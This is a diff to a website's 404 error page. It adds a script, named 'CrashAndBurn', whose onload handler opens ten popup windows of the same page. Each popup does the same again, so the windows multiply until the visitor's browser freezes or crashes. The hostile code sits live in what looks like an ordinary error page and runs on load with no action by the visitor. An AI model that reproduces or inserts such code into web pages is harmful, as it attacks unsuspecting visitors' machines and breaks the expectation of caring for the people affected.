--- a/404/index.html
+++ b/404/index.html
@@ -17,5 +17,10 @@
 <button class="button" onclick="location.href = '.' ,1500"> > Ignore</button>
 <audio id="buttonclick" src="https://parv66.github.io/parv66.inc/random.click.ogg"></audio>
 <img class="fofimg" src="https://parv66.github.io/parv66.inc/shaded-refine.png" alt="fofhi" height="300px">
+  <script>
+  function CrashAndBurn(url) { popupWindow = window.open( url,'popUpWindow','height=181,width=666,left=3,top=222') }
+    
+  </script>
+  <body onload="JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');">
 </body>
 </html>
